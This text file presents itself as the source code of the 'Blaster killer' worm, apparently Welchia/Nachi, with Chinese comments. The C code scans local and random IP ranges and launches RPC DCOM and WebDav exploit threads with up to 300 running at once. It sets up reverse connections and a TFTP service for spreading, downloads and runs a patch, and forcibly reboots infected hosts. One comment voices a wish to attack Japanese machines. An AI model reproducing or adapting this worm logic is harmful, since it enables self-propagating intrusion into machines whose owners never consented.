冲击波病毒克星原代码.txt

因为该变种病毒不但要攻击RPC漏洞

冲击波病毒克星原代码
BOOL DoServicePackFunction() 
{ 
DWORD nSystemVer = Win2000OrXp(); 
if ( !( nSystemVer == 0 ││ nSystemVer == 1) ) 
return FALSE; // not 2k or xp 




if ( ReadRegServicePack(nSystemVer) ) 
return FALSE; //已经安装了 



//识别语言版本 
int nLanguageID; 
unsigned int unOemCP = GetOEMCP(); 



LCID lcid = GetSystemDefaultLCID(); 
WORD wMain = PRIMARYLANGID(lcid); 
WORD wSub = SUBLANGID(lcid); 




if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en 
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~ 
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法 
~~ 
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn 
nLanguageID = 1; //就是为这个来的~~ 
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw 
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~ 
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp 
nLanguageID = -1; //偶好有干掉鬼子机器的冲动！ 
//罢了，冤冤相报何时了~~~ 希望他丫的自新 
~~~ 再玩火就灭了他丫的~~ 
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr 
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~ 
else{ 
nLanguageID = -1; 
} 



if ( nLanguageID == -1) 
return FALSE; 



char szServicePack[] = "RpcServicePack.exe"; 



// downlaod it~~~ 
if ( !nSystemVer ) { // 2k 
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) ) 
return FALSE; 
} 
else{ 
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) ) 
return FALSE; 
} 



char szExec[180]; 
sprintf(szExec, "%s -n -o -z -q", szServicePack); 



HANDLE hProcess = MakeProcess( szExec ); 
if ( hProcess == NULL ) 
return FALSE; 



if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内 
未完成 
TerminateProcess(hProcess,1); 
CloseHandle(hProcess); 
DeleteFile(szServicePack); 
return FALSE; 
} 
CloseHandle(hProcess); 



Sleep(15000); 
DeleteFile(szServicePack); 
if ( ReadRegServicePack(nSystemVer) ) { 
ShutDownWindows( EWX_REBOOT │ EWX_FORCE );//install service pack ok, reboot 
it~~~ 
Sleep(20000); //说偶重启有过？ 不重启补丁无效， 
找 Bill该死 说去~~~ 
} 



return TRUE; 
} 



// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~ 
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL 
bWebDav) 
{ 
HANDLE hThread = NULL; 
BOOL bFirst = TRUE; 
u_long uComp; 



for (int i=0;i< (nBCount * 256 * 256); i++){ 



if ( bRand ) 
uComp = MakeRandIp(); 
else 
uComp = i + ulIpStart; 



if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好 
:)~~~ 
(BYTE)uComp == 0xc5 ││ 
(BYTE)(uComp>>8) == 0xc5 ││ 
(BYTE)(uComp>>16) == 0xc5 ││ 
(BYTE)(uComp>>24) == 0xc5 ││ 
(WORD)uComp == 0x9999 ││ 
(WORD)(uComp>>8) == 0x9999 ││ 
(WORD)(uComp>>16) == 0x9999 ) 
continue; 




u_long *myPara = new u_long; 



if ( myPara == NULL ){//如果分配失败，再尝试一次 
Sleep(100); 
myPara = new u_long; 
} 



if ( myPara ){ 
if ( hThread ) 
CloseHandle(hThread); 



*myPara = htonl( uComp); 



DWORD dwThreadId; 



if (bWebDav) 
hThread = 
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId); 
else 
hThread = 
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId); 



Sleep(2); 
} 



//添加此处代码，避免首次执行时，线程中的 
InterlockedIncrement(&g_CurThreadCount) 未来得及运行，一次性建立了N个线程的 
bug! 
if ( bFirst && (i >= nMaxThread) ){ 
Sleep(2000); 
bFirst = FALSE; 
} 



while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心， 
玩过了~~~ 
Sleep(2); 



} 



Sleep(60000); 
} 




//服务模式和控制台模式公用主程序 
void DoIt() 
{ 
WSADATAwsd; 
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
return; 



//杀蠕虫 
KillMsblast(); 



//卸载 
SYSTEMTIME st; 
GetLocalTime(&st); 
if ( st.wYear == 2004 ){ 
MyDeleteService(szServiceName); 
MyDeleteService(szServiceTftpd); 
RemoveMe(); 
ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将 
自身文件删除了 
} 



srand( GetTickCount() ); 



memset(pPingBuffer, '\xAA', sizeof(pPingBuffer)); 
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补 
丁已经打够了!~~~ 




//准备WebDav发送缓冲区 
do{ 
pWebDavExploitBuffer = new char[68000]; 
Sleep(100); 
}while(pWebDavExploitBuffer == NULL); 



//必须在checkonlien 之前,一次装配好子弹 
PressWebDavBufferOnce(); 
PressRpcDcomBufferOnce(); 



CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口 



//打补丁 
DoServicePackFunction(); 



//建立接收线程 
DWORD dwThreadID; 
HANDLE 
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L 
PVOID)NULL,0,&dwThreadID); 
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之, 
同时处理多个反连 
return; 
CloseHandle(hWorkThread); 



if ( !MyStartService(szServiceTftpd) ){ 
Sleep(1000); 
InstallTftpService(); 
Sleep(1000); 
MyStartService(szServiceTftpd); 
} 



Sleep(2000); //等待接收线程中的全局 rand bind port 




u_long ulIP; 
for(;;){ //估算了一下，普通机器２小时一循环 




//首先扫描本ip段 
CheckOnlienAndPressData(); 
ulIP = ntohl(inet_addr(szLocalIp)); 
ulIP &= 0xffff0000; 
BeginExploitFunction( ulIP, 1, 0, 0); 




//再扫描本ip前后3个段 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
ulIP += 0x00010000; 
else 
ulIP -= 0x00030000; 
BeginExploitFunction( ulIP, 3, 0, 0); 




//再扫描WebDav一个段,跳出 135 syn封锁 
CheckOnlienAndPressData(); 
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~, 
立即采取补救措施~~~ sorry~~~ 
BeginExploitFunction( ulIP, 1, 0, 1); 




//再扫描随机的IP, 数量1个 B段, rpc or webdav 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
BeginExploitFunction( ulIP, 1, 1, 0); 
else 
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~ 




KillMsblast(); 



} 



//WSACleanup(); 



}